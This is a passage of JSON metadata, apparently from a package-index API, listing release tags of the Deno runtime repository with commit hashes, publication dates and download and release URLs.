ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3